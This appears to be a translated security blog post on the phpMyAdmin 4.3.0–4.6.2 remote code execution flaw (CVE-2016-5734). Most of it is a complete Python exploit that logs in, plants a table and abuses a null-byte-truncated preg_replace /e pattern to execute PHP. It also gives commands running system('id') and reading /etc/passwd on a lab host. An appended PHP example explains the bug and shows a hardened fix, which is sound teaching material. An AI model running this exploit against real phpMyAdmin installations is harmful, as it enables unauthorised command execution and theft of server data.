
phpMyAdmin remote code execution vulnerability (CVE-2016-5734)


Introduction

Environment for reproduction: https://github.com/vulhub/vulhub

Online platform: inside Yulin University, the association's internal cybersecurity lab platform can be used.

phpMyAdmin is an open-source, web-based MySQL database administration tool.

Affected versions

phpMyAdmin 4.3.0 - 4.6.2

Code audit

To be updated...

Exploitation

Exploit script (Python)

#!/usr/bin/env python
"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""
import requests
import argparse
import sys

__author__ = "@iamsecurity"

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("url", type=str, help="URL with path to PMA")
    parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
    parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
    parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
    parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
    parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
    arguments = parser.parse_args()
    url_to_pma = arguments.url
    uname = arguments.user
    upass = arguments.pwd
    if arguments.dbs:
        db = arguments.dbs
    else:
        db = "test"
    token = False
    custom_table = False
    if arguments.table:
        custom_table = True
        table = arguments.table
    else:
        table = "prgpwn"
    if arguments.cmd:
        payload = arguments.cmd
    else:
        payload = "system('uname -a');"
    size = 32  # length of the phpMyAdmin token scraped from the login response
    s = requests.Session()
    # you can manually add proxy support it's very simple ;)
    # s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
    s.verify = False
    # The seeded cell value 0x302F6500 is the byte string "0/e\0"; the same
    # string is used below as the regex "find" term so the truncated pattern matches.
    sql = '''CREATE TABLE `{0}` (
  `first` varchar(10) CHARACTER SET utf8 NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));'''.format(table)

    # get_token: log in and scrape the CSRF token out of the response body
    resp = s.post(url_to_pma + "/?lang=en", dict(
        pma_username=uname,
        pma_password=upass
    ))
    if resp.status_code == 200:
        token_place = resp.text.find("token=") + 6
        token = resp.text[token_place:token_place + size]
    if token is False:
        print("Cannot get valid authorization token.")
        sys.exit(1)

    if custom_table is False:
        data = {
            "is_js_confirmed": "0",
            "db": db,
            "token": token,
            "pos": "0",
            "sql_query": sql,
            "sql_delimiter": ";",
            "show_query": "0",
            "fk_checks": "0",
            "SQL": "Go",
            "ajax_request": "true",
            "ajax_page_request": "true",
        }
        resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
        if resp.status_code == 200:
            if "success" in resp.json():
                if resp.json()["success"] is False:
                    first = resp.json()["error"][resp.json()["error"].find("<code>") + 6:]
                    error = first[:first.find("</code>")]
                    if "already exists" in error:
                        print(error)
                    else:
                        print("ERROR: " + error)
                        sys.exit(1)

    # build exploit: "find" ends in a NUL byte, so PHP < 5.4.7 truncates the
    # pattern "/0/e\0/i" to "/0/e" and the /e modifier eval()s "replaceWith"
    exploit = {
        "db": db,
        "table": table,
        "token": token,
        "goto": "sql.php",
        "find": "0/e\0",
        "replaceWith": payload,
        "columnIndex": "0",
        "useRegex": "on",
        "submit": "Go",
        "ajax_request": "true"
    }
    resp = s.post(
        url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)
    )
    if resp.status_code == 200:
        result = resp.json()["message"][resp.json()["message"].find("</a>") + 8:]
        if len(result):
            print("result: " + result)
            sys.exit(0)
    print("Exploit failed!\n"
          "Try to manually set exploit parameters like --table, --database and --token.\n"
          "Remember that servers with PHP version greater than 5.4.6 "
          "is not exploitable, because of warning about null byte in regexp")
    sys.exit(1)

python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system('id')"

python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system('cat /etc/passwd')"
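The mechanism the script's docstring relies on (a NUL byte cutting a preg_replace() pattern short so that the "e" left before it becomes a modifier) is shown below as an added PHP illustration of the bug class. This is not phpMyAdmin's code and not the exploit author's; the function names find_replace_vulnerable and find_replace_hardened are invented for the example, the sample cell value is constructed to mirror what the script seeds with UNHEX('302F6500'), and the vulnerable path is only reachable on PHP < 5.4.7, where the pattern is truncated at the NUL and the /e modifier still exists (it was removed in PHP 7.0).

```php
<?php
// Added illustration of the CVE-2016-5734 bug class; not phpMyAdmin's code.
// Both helper names are invented for this example.

// Vulnerable shape: user input is spliced into the pattern AND used as the
// replacement. On PHP < 5.4.7 the pattern "/0/e\0/i" built from
// $find = "0/e\0" is read only up to the NUL byte, i.e. as "/0/e": the
// intended closing "/i" is lost, "e" becomes a modifier, and /e makes
// preg_replace() eval() $replaceWith as PHP for every match of "0".
function find_replace_vulnerable($cell, $find, $replaceWith)
{
    return preg_replace('/' . $find . '/i', $replaceWith, $cell);
}

// Hardened shape:
//  1. a NUL byte is never a legitimate search term, so reject it outright
//     (PHP >= 5.4.7 refuses it anyway, but with a warning and a NULL return
//     that a caller may ignore; fail closed instead);
//  2. a plain search never touches the regex engine;
//  3. a regex search escapes the delimiter, compiles the pattern first so a
//     term that still terminates the pattern and smuggles in modifiers is a
//     caller error rather than a silent NULL, and uses preg_replace_callback(),
//     whose replacement is data returned from a closure and is never evaluated.
function find_replace_hardened($cell, $find, $replaceWith, $useRegex)
{
    if (strpos($find, "\0") !== false) {
        throw new InvalidArgumentException('NUL byte in search term');
    }
    if (!$useRegex) {
        return str_replace($find, $replaceWith, $cell);
    }
    $pattern = '/' . str_replace('/', '\/', $find) . '/i';
    if (@preg_match($pattern, '') === false) {
        throw new InvalidArgumentException('invalid regular expression');
    }
    return preg_replace_callback(
        $pattern,
        static function ($m) use ($replaceWith) { return $replaceWith; },
        $cell
    );
}

// Constructed sample input, mirroring the row the exploit seeds.
$cell = "0/e\0";
$find = "0/e\0";                 // the pattern-truncating find term
$replaceWith = "system('id');";  // attacker-chosen PHP, only meaningful under /e

// Vulnerable path on PHP < 5.4.7: evaluates system('id'). On PHP >= 5.4.7 the
// NUL triggers a "Null byte in regex" warning and preg_replace() returns NULL.
var_dump(find_replace_vulnerable($cell, $find, $replaceWith));

// Hardened path: the NUL is rejected before the regex engine ever sees it.
try {
    find_replace_hardened($cell, $find, $replaceWith, true);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// Hardened regex path with a benign term: every "0" in the cell is replaced by
// the literal text of $replaceWith, which is never executed.
echo find_replace_hardened("a0b", "0", $replaceWith, true), "\n";
```

The hardened function still has to run on a patched interpreter to be meaningful: on PHP < 5.4.7 the NUL check is what blocks the truncation, and the closure-based replacement is what removes the eval() even if a modifier were ever injected. Both defences are cheap, and together they remove the two ingredients the exploit needs: a pattern the attacker can terminate, and a replacement that is executed rather than copied.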


Original article: https://www.cnblogs.com/xhds/p/12579289.html
